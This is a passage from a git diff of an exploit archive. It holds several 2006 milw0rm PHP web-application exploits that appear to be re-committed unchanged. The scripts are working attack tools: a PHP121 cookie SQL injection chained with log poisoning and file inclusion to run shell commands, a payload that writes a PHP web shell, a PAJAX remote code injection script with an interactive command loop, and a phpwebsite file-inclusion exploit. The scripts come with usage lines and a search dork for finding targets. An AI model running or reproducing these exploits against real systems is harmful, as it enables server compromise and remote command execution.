$i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} 
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -$host=$argv[1]; -$path=$argv[2]; -$cmd="";$port=80;$proxy=""; - -for ($i=3; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$cmd=urlencode($cmd); -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -echo "[1] Injecting some code in log files ...\r\n\r\n"; -$CODE=""; -$packet="GET ".$p.$CODE." HTTP/1.0\r\n"; -$packet.="User-Agent: ".$CODE." 
Googlebot/2.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: close\r\n\r\n"; -sendpacketii($packet); -sleep(1); - -$paths=array( -"../../../../../../../../../../var/log/httpd/access_log", -"../../../../../../../../../../var/log/httpd/error_log", -"../apache/logs/error.log", -"../apache/logs/access.log", -"../../apache/logs/error.log", -"../../apache/logs/access.log", -"../../../apache/logs/error.log", -"../../../apache/logs/access.log", -"../../../../apache/logs/error.log", -"../../../../apache/logs/access.log", -"../../../../../apache/logs/error.log", -"../../../../../apache/logs/access.log", -"../../../../../../apache/logs/error.log", -"../../../../../../apache/logs/access.log", -"../logs/error.log", -"../logs/access.log", -"../../logs/error.log", -"../../logs/access.log", -"../../../logs/error.log", -"../../../logs/access.log", -"../../../../logs/error.log", -"../../../../logs/access.log", -"../../../../../logs/error.log", -"../../../../../logs/access.log", -"../../../../../../logs/error.log", -"../../../../../../logs/access.log", -"../../../../../../../../../../etc/httpd/logs/acces_log", -"../../../../../../../../../../etc/httpd/logs/acces.log", -"../../../../../../../../../../etc/httpd/logs/error_log", -"../../../../../../../../../../etc/httpd/logs/error.log", -"../../../../../../../../../../var/www/logs/access_log", -"../../../../../../../../../../var/www/logs/access.log", -"../../../../../../../../../../usr/local/apache/logs/access_log", -"../../../../../../../../../../usr/local/apache/logs/access.log", -"../../../../../../../../../../var/log/apache/access_log", -"../../../../../../../../../../var/log/apache/access.log", -"../../../../../../../../../../var/log/access_log", -"../../../../../../../../../../var/www/logs/error_log", -"../../../../../../../../../../var/www/logs/error.log", -"../../../../../../../../../../usr/local/apache/logs/error_log", -"../../../../../../../../../../usr/local/apache/logs/error.log", 
-"../../../../../../../../../../var/log/apache/error_log", -"../../../../../../../../../../var/log/apache/error.log", -"../../../../../../../../../../var/log/access_log", -"../../../../../../../../../../var/log/error_log" -); - - -for ($i=0; $i<=count($paths)-1; $i++) -{ - $a=$i+2; - echo "[".$a."] Trying with: ".$paths[$i]."%00\r\n"; - $sql="'UNION SELECT '".$paths[$i].chr(0x00)."' FROM php121_users/*"; - $sql=urlencode($sql); - $packet ="GET ".$p."php121login.php HTTP/1.0\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Cookie: php121un=".$sql."; php121pw=suntzu;\r\n"; - $packet.="Connection: Close\r\n\r\n"; - #debug - #echo quick_dump($packet); - sendpacketii($packet); - - $temp=explode("Set-Cookie: ",$html); - $temp2=explode(" ",$temp[1]); - $cookie=$temp2[0]; - echo "Cookie -> ".$cookie."\r\n\r\n"; - if ($cookie=='') { - echo $html; - die("Something goes wrong...\r\n"); - } - - $packet ="GET ".$p."php121language.php HTTP/1.0\r\n"; - $packet.="User-Agent: GoogleBot/2.1\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Cookie: ".$cookie."; cmd=".$cmd.";\r\n"; - $packet.="Connection: Close\r\n\r\n"; - #debug - #echo quick_dump($packet); - sendpacketii($packet); - if (strstr($html,"56789")) - { - echo "Exploit succeeded...\r\n"; - $temp=explode("56789",$html); - echo $temp[1]; - die; - } -} -//if you are here... -echo "Exploit failed..."; -?> - -# milw0rm.com [2006-04-12] +#!/usr/bin/php -q -d short_open_tag=on + works with magic_quotes_gpc = Off\r\n\r\n"; +echo "a dork: inurl:php121login.php | inurl:php121im.php | intitle:\"PHP121 - PLEASE\"\r\n\r\n"; + +if ($argc<4) { +echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; +echo "host: target server (ip/hostname)\r\n"; +echo "path: path to PHP121\r\n"; +echo "cmd: a shell command\r\n"; +echo "Options:\r\n"; +echo " -p[port]: specify a port other than 80\r\n"; +echo " -P[ip:port]: specify a proxy\r\n"; +echo "Examples:\r\n"; +echo "php ".$argv[0]." 
localhost /php121/ cat php121config.php\r\n"; +echo "php ".$argv[0]." localhost /php121/ ls -la -p81\r\n"; +echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n"; +die; +} + +/* + software site: http://www.php121.com/ + description: "PHP121 is a free web based instant messenger - written entirely in + PHP" + + i) vulnerable code in php121login.php and in nearly all files: + + ... + if (isset($_COOKIE['php121un']) && isset($_COOKIE['php121pw'])) { + $logindataun = $_COOKIE['php121un']; + $logindatapw = $_COOKIE['php121pw']; + if (!empty($logindataun) && !empty($logindatapw)) { + //we have a cookie - use it to login, overriding any sessions + $_SESSION[sess_username]=$logindataun; + $_SESSION[sess_password]=$logindatapw; + } +} + +$sess_username=$_SESSION[sess_username]; +$sess_password=$_SESSION[sess_password]; + ... + + in php121language.php we have: + +... +$sess_username=$_SESSION[sess_username]; +$sess_password=$_SESSION[sess_password]; +// are we logged in? + +if ($sess_username!="") { + + // get our language preference + $sql="select $dbf_language from $db_usertable where $dbf_uname='$sess_username'"; + echo "sql: ".$sql."\r\n"; + $row=mysql_fetch_row(mysql_query($sql)); + if ($row[0]!="") { + require_once("language/lang-".strtolower($row[0]).".php"); + + } + +} else { + + // use the default language file + require_once("language/lang-".strtolower($php121_config['default_language']).".php"); + +} +... 
+ + "sess_username" value is not sanitized before to be used in our query + so, if magic_quotes_gpc = Off, we can include arbitrary files from local + resources, poc: + + GET /php121login.php HTTP/1.0 + Host: somehost + Cookie: php121un=%27UNION+SELECT+%27..%2F..%2F..%2Fetc%2Fpasswd%00%27+FROM+php121_users%2F%2A; php121pw=suntzu; + Connection: Close + + now session cookie is poisoned, and we can go to php121language.php + with our new cookie to see/include local resources, query becomes: + + select php121_language from php121_users where uname=''UNION SELECT '../../../etc/passwd[null char]' FROM php121_users/*' + + php121_language field is varchar(30) so, before MySQL 4.1.1, + your path is limited to 29 chars (so, it is nearly impossible + submit a valid inclusion path), with Mysql >=4.1.1 it does not matter, + path is not truncated anymore at the length of the first select field + + we can also try blind injection, injecting a shell: + + GET /php121login.php HTTP/1.0 + Host: somehost + Cookie: php121un=%27UNION+SELECT+%27%3C%3Fphp+system%28%24_GET%5Bcmd%5D%29%3B%3F%3E%27+INTO+DUMPFILE+%27somefile%27+FROM+php121_users%2F%2A; php121pw=suntzu; + Connection: Close + + and now go to php121language.php to write our file, if MySQL have certain rigths + to do it + + you can do the work trough a browser like Opera that allows to edit cookies + + However, this exploit inject some code in log files and try to include them + + */ +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} 
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +$host=$argv[1]; +$path=$argv[2]; +$cmd="";$port=80;$proxy=""; + +for ($i=3; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +$cmd=urlencode($cmd); +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +echo "[1] Injecting some code in log files ...\r\n\r\n"; +$CODE=""; +$packet="GET ".$p.$CODE." HTTP/1.0\r\n"; +$packet.="User-Agent: ".$CODE." 
Googlebot/2.1\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: close\r\n\r\n"; +sendpacketii($packet); +sleep(1); + +$paths=array( +"../../../../../../../../../../var/log/httpd/access_log", +"../../../../../../../../../../var/log/httpd/error_log", +"../apache/logs/error.log", +"../apache/logs/access.log", +"../../apache/logs/error.log", +"../../apache/logs/access.log", +"../../../apache/logs/error.log", +"../../../apache/logs/access.log", +"../../../../apache/logs/error.log", +"../../../../apache/logs/access.log", +"../../../../../apache/logs/error.log", +"../../../../../apache/logs/access.log", +"../../../../../../apache/logs/error.log", +"../../../../../../apache/logs/access.log", +"../logs/error.log", +"../logs/access.log", +"../../logs/error.log", +"../../logs/access.log", +"../../../logs/error.log", +"../../../logs/access.log", +"../../../../logs/error.log", +"../../../../logs/access.log", +"../../../../../logs/error.log", +"../../../../../logs/access.log", +"../../../../../../logs/error.log", +"../../../../../../logs/access.log", +"../../../../../../../../../../etc/httpd/logs/acces_log", +"../../../../../../../../../../etc/httpd/logs/acces.log", +"../../../../../../../../../../etc/httpd/logs/error_log", +"../../../../../../../../../../etc/httpd/logs/error.log", +"../../../../../../../../../../var/www/logs/access_log", +"../../../../../../../../../../var/www/logs/access.log", +"../../../../../../../../../../usr/local/apache/logs/access_log", +"../../../../../../../../../../usr/local/apache/logs/access.log", +"../../../../../../../../../../var/log/apache/access_log", +"../../../../../../../../../../var/log/apache/access.log", +"../../../../../../../../../../var/log/access_log", +"../../../../../../../../../../var/www/logs/error_log", +"../../../../../../../../../../var/www/logs/error.log", +"../../../../../../../../../../usr/local/apache/logs/error_log", +"../../../../../../../../../../usr/local/apache/logs/error.log", 
+"../../../../../../../../../../var/log/apache/error_log", +"../../../../../../../../../../var/log/apache/error.log", +"../../../../../../../../../../var/log/access_log", +"../../../../../../../../../../var/log/error_log" +); + + +for ($i=0; $i<=count($paths)-1; $i++) +{ + $a=$i+2; + echo "[".$a."] Trying with: ".$paths[$i]."%00\r\n"; + $sql="'UNION SELECT '".$paths[$i].chr(0x00)."' FROM php121_users/*"; + $sql=urlencode($sql); + $packet ="GET ".$p."php121login.php HTTP/1.0\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Cookie: php121un=".$sql."; php121pw=suntzu;\r\n"; + $packet.="Connection: Close\r\n\r\n"; + #debug + #echo quick_dump($packet); + sendpacketii($packet); + + $temp=explode("Set-Cookie: ",$html); + $temp2=explode(" ",$temp[1]); + $cookie=$temp2[0]; + echo "Cookie -> ".$cookie."\r\n\r\n"; + if ($cookie=='') { + echo $html; + die("Something goes wrong...\r\n"); + } + + $packet ="GET ".$p."php121language.php HTTP/1.0\r\n"; + $packet.="User-Agent: GoogleBot/2.1\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Cookie: ".$cookie."; cmd=".$cmd.";\r\n"; + $packet.="Connection: Close\r\n\r\n"; + #debug + #echo quick_dump($packet); + sendpacketii($packet); + if (strstr($html,"56789")) + { + echo "Exploit succeeded...\r\n"; + $temp=explode("56789",$html); + echo $temp[1]; + die; + } +} +//if you are here... +echo "Exploit failed..."; +?> + +# milw0rm.com [2006-04-12] diff --git a/platforms/php/webapps/1668.php b/platforms/php/webapps/1668.php index e07b9b742..04e782f37 100755 --- a/platforms/php/webapps/1668.php +++ b/platforms/php/webapps/1668.php @@ -1,62 +1,62 @@ -" - ."turl:

    " - ."hurl:

    " - ."cmd:

    " - ."" - - ."
    "; - -if (!isset($_POST['submit'])) -{ - -echo $form; - -}else{ - -$file = fopen ("test.txt", "w+"); - -fwrite($file, ""); -fclose($file); - -$file = fopen ($turl.$hurl, "r"); -if (!$file) { - echo "

    Unable to get output.\n"; - exit; -} - -echo $form; - -while (!feof ($file)) { - $line .= fgets ($file, 1024)."
    "; - } -$tpos1 = strpos($line, "++BEGIN++"); -$tpos2 = strpos($line, "++END++"); -$tpos1 = $tpos1+strlen("++BEGIN++"); -$tpos2 = $tpos2-$tpos1; -$output = substr($line, $tpos1, $tpos2); -echo $output; - -} -?> - -# milw0rm.com [2006-04-13] +" + ."turl:

    " + ."hurl:

    " + ."cmd:

    " + ."" + + ."


    "; + +if (!isset($_POST['submit'])) +{ + +echo $form; + +}else{ + +$file = fopen ("test.txt", "w+"); + +fwrite($file, ""); +fclose($file); + +$file = fopen ($turl.$hurl, "r"); +if (!$file) { + echo "

    Unable to get output.\n"; + exit; +} + +echo $form; + +while (!feof ($file)) { + $line .= fgets ($file, 1024)."
    "; + } +$tpos1 = strpos($line, "++BEGIN++"); +$tpos2 = strpos($line, "++END++"); +$tpos1 = $tpos1+strlen("++BEGIN++"); +$tpos2 = $tpos2-$tpos1; +$output = substr($line, $tpos1, $tpos2); +echo $output; + +} +?> + +# milw0rm.com [2006-04-13] diff --git a/platforms/php/webapps/1672.pl b/platforms/php/webapps/1672.pl index 4fd936785..692357e76 100755 --- a/platforms/php/webapps/1672.pl +++ b/platforms/php/webapps/1672.pl 
@@ -1,37 +1,37 @@ -#!/usr/bin/perl - -use IO::Socket; - -print "PAJAX Remote Code Injection - code by: Stoney - exploit found -by: RedTeam\n"; - -if ($ARGV[0] && $ARGV[1]) -{ - $host = $ARGV[0]; - $path = $ARGV[1]; - $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", -PeerPort => "80") || die "connecterror\n"; - while (1) { - print '['.$host.']# '; - $cmd = ; - chop($cmd); - last if ($cmd eq 'exit'); - $ajaxdata = "{\"id\": \"bb2238f1186dad8d6370d2bab5f290f71\", \"className\": \"Calculator\", \"method\": \"add(1,1);system($cmd);\$obj->add\", \"params\": [\"1\", \"5\"]}"; - - print $sock "POST ".$path." HTTP/1.1\n"; - print $sock "Host: ".$host."\n"; - print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7"; - print $sock "Content-Type: text/json\n"; - print $sock "Content-Length:".length($ajaxdata)."\n\n".$ajaxdata; - while ($ans = <$sock>) - { - print "$ans"; - } - } - } -else { - print "Usage: perl ajax.pl [host] [path_to_ajax]\n\n"; -exit; -} - -# milw0rm.com [2006-04-13] +#!/usr/bin/perl + +use IO::Socket; + +print "PAJAX Remote Code Injection - code by: Stoney - exploit found +by: RedTeam\n"; + +if ($ARGV[0] && $ARGV[1]) +{ + $host = $ARGV[0]; + $path = $ARGV[1]; + $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", +PeerPort => "80") || die "connecterror\n"; + while (1) { + print '['.$host.']# '; + $cmd = ; + chop($cmd); + last if ($cmd eq 'exit'); + $ajaxdata = "{\"id\": \"bb2238f1186dad8d6370d2bab5f290f71\", \"className\": \"Calculator\", \"method\": \"add(1,1);system($cmd);\$obj->add\", \"params\": [\"1\", \"5\"]}"; + + print $sock "POST ".$path." 
HTTP/1.1\n"; + print $sock "Host: ".$host."\n"; + print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7"; + print $sock "Content-Type: text/json\n"; + print $sock "Content-Length:".length($ajaxdata)."\n\n".$ajaxdata; + while ($ans = <$sock>) + { + print "$ans"; + } + } + } +else { + print "Usage: perl ajax.pl [host] [path_to_ajax]\n\n"; +exit; +} + +# milw0rm.com [2006-04-13] diff --git a/platforms/php/webapps/1673.php b/platforms/php/webapps/1673.php index d1f275ccd..aa84385af 100755 --- a/platforms/php/webapps/1673.php +++ b/platforms/php/webapps/1673.php 
@@ -1,221 +1,221 @@ -#!/usr/bin/php -q -d short_open_tag=on - arbitrary local inclusion, works with magic_quotes_gpc = Off\r\n"; -echo "by rgod, mail: rgod@autistici.org\r\n"; -echo "site: http://retrogod.altervista.org\r\n\r\n"; - -if ($argc<4) { -echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; -echo "host: target server (ip/hostname)\r\n"; -echo "path: path to phpwebsite\r\n"; -echo "cmd: a shell command\r\n"; -echo "Options:\r\n"; -echo " -p[port]: specify a port other than 80\r\n"; -echo " -P[ip:port]: specify a proxy\r\n"; -echo "Examples:\r\n"; -echo "php ".$argv[0]." localhost /phpwebsite/ ls -la\r\n"; -die; -} - -/* explaination: - vulnerable code in index.php at lines 21-29: - -... - if (!isset($hub_dir)) { - $hub_dir = NULL; -} -if (!preg_match ("/:\/\//i", $hub_dir)) { - loadConfig($hub_dir); -} else { - exit('FATAL ERROR! Hub directory was malformed.'); -} -... - -and at lines 125-143: - -... -function loadConfig($hub_dir){ - - if (file_exists($hub_dir . 'conf/config.php')) { - if (filesize($hub_dir . 'conf/config.php') > 0) { - include($hub_dir . 'conf/config.php'); - - define('PHPWS_SOURCE_DIR', $source_dir); - - - } else { - - header('Location: ./setup/set_config.php'); - exit(); - } - } else { - header('Location: ./setup/set_config.php'); - exit(); - } -} -.... 
- -so, you can include files from local resources, poc: - -http://[target]/[path]/index.php?hub_dir=/var/log/httpd/access_log%00 - -you don't see output, but we have some code in log files, it will be executed - -also, on php5, arbitrary remote inclusion: - -http://[target]/[path]/index.php?hub_dir=\\192.168.1.3\c\ - -including a full accessible share -where on samba resource you have some code in conf/config.php - */ -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -$host=$argv[1]; -$path=$argv[2]; -$cmd="";$port=80;$proxy=""; - -for ($i=3; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$cmd=urlencode($cmd); -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -echo "[1] Injecting some code in log files...\r\n"; -$CODE =''; -$packet.="GET ".$path.$CODE." 
HTTP/1.1\r\n"; -$packet.="User-Agent: ".$CODE."\r\n"; -$packet.="Host: ".$serv."\r\n"; -$packet.="Connection: close\r\n\r\n"; -#debug -#echo quick_dump($packet); -sendpacketii($packet); -sleep(2); - -# fill with possible locations -$paths= array ( - "/var/log/httpd/access_log", - "/var/log/httpd/error_log", - "../apache/logs/error.log", - "../apache/logs/access.log", - "../../apache/logs/error.log", - "../../apache/logs/access.log", - "../../../apache/logs/error.log", - "../../../apache/logs/access.log", - "../../../../apache/logs/error.log", - "../../../../apache/logs/access.log", - "/etc/httpd/logs/acces_log", - "/etc/httpd/logs/acces.log", - "/etc/httpd/logs/error_log", - "/etc/httpd/logs/error.log", - "/var/www/logs/access_log", - "/var/www/logs/access.log", - "/usr/local/apache/logs/access_log", - "/usr/local/apache/logs/access.log", - "/var/log/apache/access_log", - "/var/log/apache/access.log", - "/var/log/access_log", - "/var/www/logs/error_log", - "/www/logs/error.log", - "/usr/local/apache/logs/error_log", - "/usr/local/apache/logs/error.log", - "/var/log/apache/error_log", - "/var/log/apache/error.log", - "/var/log/access_log", - "/var/log/error_log", -); - -for ($i=0; $i<=count($paths)-1; $i++) -{ - $j=$i+2; - echo "[".$j."] Trying with ".$paths[$i]."%00\r\n"; - $xpl=$paths[$i]; - $packet ="GET ".$p."index.php?cmd=".$cmd."&hub_dir=".$xpl."%00 HTTP/1.0\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Connection: Close\r\n\r\n"; - #debug, shows packets in a nice format - #echo quick_dump($packet); - sendpacketii($packet); - if (strstr($html,"666")){ - echo "Exploit succeeded...\r\n"; - $temp=explode("666",$html); - echo $temp[1]; - die; - } -} -#if you are here... 
-echo "Exploit failed..."; -?> - -# milw0rm.com [2006-04-14] +#!/usr/bin/php -q -d short_open_tag=on + arbitrary local inclusion, works with magic_quotes_gpc = Off\r\n"; +echo "by rgod, mail: rgod@autistici.org\r\n"; +echo "site: http://retrogod.altervista.org\r\n\r\n"; + +if ($argc<4) { +echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; +echo "host: target server (ip/hostname)\r\n"; +echo "path: path to phpwebsite\r\n"; +echo "cmd: a shell command\r\n"; +echo "Options:\r\n"; +echo " -p[port]: specify a port other than 80\r\n"; +echo " -P[ip:port]: specify a proxy\r\n"; +echo "Examples:\r\n"; +echo "php ".$argv[0]." localhost /phpwebsite/ ls -la\r\n"; +die; +} + +/* explaination: + vulnerable code in index.php at lines 21-29: + +... + if (!isset($hub_dir)) { + $hub_dir = NULL; +} +if (!preg_match ("/:\/\//i", $hub_dir)) { + loadConfig($hub_dir); +} else { + exit('FATAL ERROR! Hub directory was malformed.'); +} +... + +and at lines 125-143: + +... +function loadConfig($hub_dir){ + + if (file_exists($hub_dir . 'conf/config.php')) { + if (filesize($hub_dir . 'conf/config.php') > 0) { + include($hub_dir . 'conf/config.php'); + + define('PHPWS_SOURCE_DIR', $source_dir); + + + } else { + + header('Location: ./setup/set_config.php'); + exit(); + } + } else { + header('Location: ./setup/set_config.php'); + exit(); + } +} +.... 
+ +so, you can include files from local resources, poc: + +http://[target]/[path]/index.php?hub_dir=/var/log/httpd/access_log%00 + +you don't see output, but we have some code in log files, it will be executed + +also, on php5, arbitrary remote inclusion: + +http://[target]/[path]/index.php?hub_dir=\\192.168.1.3\c\ + +including a full accessible share +where on samba resource you have some code in conf/config.php + */ +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +$host=$argv[1]; +$path=$argv[2]; +$cmd="";$port=80;$proxy=""; + +for ($i=3; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +$cmd=urlencode($cmd); +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +echo "[1] Injecting some code in log files...\r\n"; +$CODE =''; +$packet.="GET ".$path.$CODE." 
HTTP/1.1\r\n"; +$packet.="User-Agent: ".$CODE."\r\n"; +$packet.="Host: ".$serv."\r\n"; +$packet.="Connection: close\r\n\r\n"; +#debug +#echo quick_dump($packet); +sendpacketii($packet); +sleep(2); + +# fill with possible locations +$paths= array ( + "/var/log/httpd/access_log", + "/var/log/httpd/error_log", + "../apache/logs/error.log", + "../apache/logs/access.log", + "../../apache/logs/error.log", + "../../apache/logs/access.log", + "../../../apache/logs/error.log", + "../../../apache/logs/access.log", + "../../../../apache/logs/error.log", + "../../../../apache/logs/access.log", + "/etc/httpd/logs/acces_log", + "/etc/httpd/logs/acces.log", + "/etc/httpd/logs/error_log", + "/etc/httpd/logs/error.log", + "/var/www/logs/access_log", + "/var/www/logs/access.log", + "/usr/local/apache/logs/access_log", + "/usr/local/apache/logs/access.log", + "/var/log/apache/access_log", + "/var/log/apache/access.log", + "/var/log/access_log", + "/var/www/logs/error_log", + "/www/logs/error.log", + "/usr/local/apache/logs/error_log", + "/usr/local/apache/logs/error.log", + "/var/log/apache/error_log", + "/var/log/apache/error.log", + "/var/log/access_log", + "/var/log/error_log", +); + +for ($i=0; $i<=count($paths)-1; $i++) +{ + $j=$i+2; + echo "[".$j."] Trying with ".$paths[$i]."%00\r\n"; + $xpl=$paths[$i]; + $packet ="GET ".$p."index.php?cmd=".$cmd."&hub_dir=".$xpl."%00 HTTP/1.0\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Connection: Close\r\n\r\n"; + #debug, shows packets in a nice format + #echo quick_dump($packet); + sendpacketii($packet); + if (strstr($html,"666")){ + echo "Exploit succeeded...\r\n"; + $temp=explode("666",$html); + echo $temp[1]; + die; + } +} +#if you are here... +echo "Exploit failed..."; +?> + +# milw0rm.com [2006-04-14] diff --git a/platforms/php/webapps/1674.txt b/platforms/php/webapps/1674.txt index 9154fea3d..e976e54bb 100755 --- a/platforms/php/webapps/1674.txt +++ b/platforms/php/webapps/1674.txt 
